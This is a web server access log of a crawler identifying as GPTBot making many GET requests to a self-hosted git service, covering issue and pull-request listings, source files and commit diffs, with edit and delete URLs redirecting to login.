"/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html?display=source" [Client 74.7.227.38] [Length 554808] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html?display=rendered" [Client 74.7.227.38] [Length 11185] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:00:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:00:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 9824] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 846224] [Gzip 27.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 958759] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 936] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:00:25 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:00:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:00:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11302] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:19:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11304] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:19:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=closed&type=all" -[17/Feb/2026:19:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=closed&type=all" -[17/Feb/2026:19:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&state=open&type=all" [Client 74.7.227.38] [Length 10127] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:19:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&state=all&type=all" -[17/Feb/2026:19:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&state=open&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:19:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12739] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:19:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11669] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:19:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:00:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 13184] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" -[17/Feb/2026:19:00:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc%2fcodec.cpp" [Client 74.7.227.38] [Length 28332] [Gzip 5.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:19:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc%2fold_codec.cpp" [Client 74.7.227.38] [Length 20728] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" -[17/Feb/2026:19:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1" [Client 74.7.227.38] [Length 55589] [Gzip 12.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:19:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fsrc-old%2fdummy.cpp" [Client 74.7.227.38] [Length 22763] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:19:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1" [Client 74.7.227.38] [Length 62185] [Gzip 14.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:19:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc%2fdummy.cpp" [Client 74.7.227.38] [Length 24873] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" -[17/Feb/2026:19:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.ninja_deps" [Client 74.7.227.38] [Length 24194] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.ninja_deps" 